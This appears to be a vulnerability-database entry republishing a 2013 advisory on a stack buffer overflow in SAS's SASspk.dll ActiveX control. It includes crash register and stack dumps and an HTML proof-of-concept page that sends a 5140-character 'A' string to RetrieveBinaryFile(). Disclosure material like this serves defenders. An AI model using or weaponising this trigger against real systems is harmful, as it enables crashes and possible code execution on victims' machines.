SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow
2014-07-01T00:00:00
ID SSV:79371 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
<!--
SAS Integration Technologies Client 9.31_M1 (SASspk.dll) Stack-based Overflow
Vendor: SAS Institute Inc.
Product web page: http://www.sas.com
Affected version: Deployment Manager 9.3.0.0 (Model 12.05, TS1M2)
SAS Integration Technologies Client 9.31_M1
Summary: SAS Integration Technologies provides you with software that
enables you to build a secure client/server infrastructure on which to
implement SAS distributed processing solutions. With SAS Integration
Technologies, you can integrate SAS with other applications in your
enterprise; provide proactive delivery of information from SAS throughout
the enterprise; extend the capabilities of SAS to meet your organization's
specific needs; and develop your own distributed applications that leverage
the analytic and reporting powers of SAS. The SAS Deployment Manager is
used for post-installation configuration tasks such as configuring some
products, applying hot fixes, updating metadata, and uninstalling SAS
software.
Desc: The SASspk module (SASspk.dll) version 9.310.0.11307, has a
function called 'RetrieveBinaryFile()' which has one parameter called
'bstrFileName' which takes arguments as strings as defined in the
function itself as ISPKBinaryFile from the SASPackageRetrieve library.
Stack-based buffer overflow was discovered in one of the fuzzing
processes that could allow arbitrary code execution by an attacker
when exploiting the non-sanitized 'bstrFileName' parameter.
======================================================================
ArgDump:
--------------------------------------------------
EBP+8 007EA404 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 0016EB30 -> 00000000
EBP+16 00940E68 -> BAADF00D
EBP+20 41414141
EBP+24 41414141
EBP+28 41414141
Stack Dump:
--------------------------------------------------
1699E0 60 0E 94 00 00 00 00 00 01 00 00 00 60 0E 94 00 [`...........`...]
1699F0 30 28 00 00 00 00 00 00 00 00 00 00 E4 EA 16 00 [................]
169A00 33 DF 4D 00 04 A4 7E 00 30 EB 16 00 68 0E 94 00 [..M.........h...]
169A10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
169A20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
======================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 EN (32/64bit)
Microsoft Windows 7 Enterprise EN (32/64bit)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5142
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5142.php
20.04.2013
-->
<html>
<title>SAS Integration Technologies Client ActiveX Stack BoF 0-day</title>
<body>
<object id='smash' classid='clsid:DDF47362-6319-11D4-87C0-00C04F48BC53' />
<script>
function run()
{
targetFile = "C:\Program Files\SASHome\x86\Integration Technologies\SASspk.dll"
prototype = "Function RetrieveBinaryFile ( ByVal bstrFileName As String ) As ISPKBinaryFile"
memberName = "RetrieveBinaryFile"
progid = "SASPackageRetrieve.SPKRetrieve"
argCount = 1
arg1=String(5140, "A")
smash.RetrieveBinaryFile arg1
}
</script><center><br /><br />
<input language=JavaScript onclick=run() type=button value="Test">
</center>
</body>
</html>
{"type": "seebug", "viewCount": 6, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T13:31:15", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T13:31:15", "rev": 2}, "vulnersScore": 0.1}, "reporter": "Root", "title": "SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79371", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-79371", "id": "SSV:79371", "status": "poc", "lastseen": "2017-11-19T13:31:15", "sourceData": "\n <!--\r\n\r\nSAS Integration Technologies Client 9.31_M1 (SASspk.dll) Stack-based Overflow\r\n\r\n\r\nVendor: SAS Institute Inc.\r\nProduct web page: http://www.sas.com\r\nAffected version: Deployment Manager 9.3.0.0 (Model 12.05, TS1M2)\r\n SAS Integration Technologies Client 9.31_M1\r\n\r\nSummary: SAS Integration Technologies provides you with software that\r\nenables you to build a secure client/server infrastructure on which to\r\nimplement SAS distributed processing solutions. With SAS Integration\r\nTechnologies, you can integrate SAS with other applications in your\r\nenterprise; provide proactive delivery of information from SAS throughout\r\nthe enterprise; extend the capabilities of SAS to meet your organization's\r\nspecific needs; and develop your own distributed applications that leverage\r\nthe analytic and reporting powers of SAS. The SAS Deployment Manager is\r\nused for post-installation configuration tasks such as configuring some\r\nproducts, applying hot fixes, updating metadata, and uninstalling SAS\r\nsoftware.\r\n\r\nDesc: The SASspk module (SASspk.dll) version 9.310.0.11307, has a\r\nfunction called 'RetrieveBinaryFile()' which has one parameter called\r\n'bstrFileName' which takes arguments as strings as defined in the\r\nfunction itself as ISPKBinaryFile from the SASPackageRetrieve library.\r\nStack-based buffer overflow was discovered in one of the fuzzing\r\nprocesses that could allow arbitrary code execution by an attacker\r\nwhen exploiting the non-sanitized 'bstrFileName' parameter.\r\n\r\n\r\n======================================================================\r\n\r\nArgDump:\r\n--------------------------------------------------\r\nEBP+8\t007EA404 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA\r\nEBP+12\t0016EB30 -> 00000000\r\nEBP+16\t00940E68 -> BAADF00D\r\nEBP+20\t41414141\r\nEBP+24\t41414141\r\nEBP+28\t41414141\r\n\r\n\r\nStack Dump:\r\n--------------------------------------------------\r\n1699E0 60 0E 94 00 00 00 00 00 01 00 00 00 60 0E 94 00 [`...........`...]\r\n1699F0 30 28 00 00 00 00 00 00 00 00 00 00 E4 EA 16 00 [................]\r\n169A00 33 DF 4D 00 04 A4 7E 00 30 EB 16 00 68 0E 94 00 [..M.........h...]\r\n169A10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n169A20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n\r\n======================================================================\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 EN (32/64bit)\r\n Microsoft Windows 7 Enterprise EN (32/64bit)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2013-5142\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5142.php\r\n\r\n\r\n20.04.2013\r\n\r\n-->\r\n\r\n\r\n<html>\r\n<title>SAS Integration Technologies Client ActiveX Stack BoF 0-day</title>\r\n<body>\r\n<object id='smash' classid='clsid:DDF47362-6319-11D4-87C0-00C04F48BC53' />\r\n<script>\r\n\r\nfunction run()\r\n{\r\n\ttargetFile = "C:\\Program Files\\SASHome\\x86\\Integration Technologies\\SASspk.dll"\r\n\tprototype = "Function RetrieveBinaryFile ( ByVal bstrFileName As String ) As ISPKBinaryFile"\r\n\tmemberName = "RetrieveBinaryFile"\r\n\tprogid = "SASPackageRetrieve.SPKRetrieve"\r\n\targCount = 1\r\n\targ1=String(5140, "A")\r\n\tsmash.RetrieveBinaryFile arg1\r\n}\r\n\r\n</script><center><br /><br />\r\n<input language=JavaScript onclick=run() type=button value="Test">\r\n</center>\r\n</body>\r\n</html>\r\n\n ", "published": "2014-07-01T00:00:00"}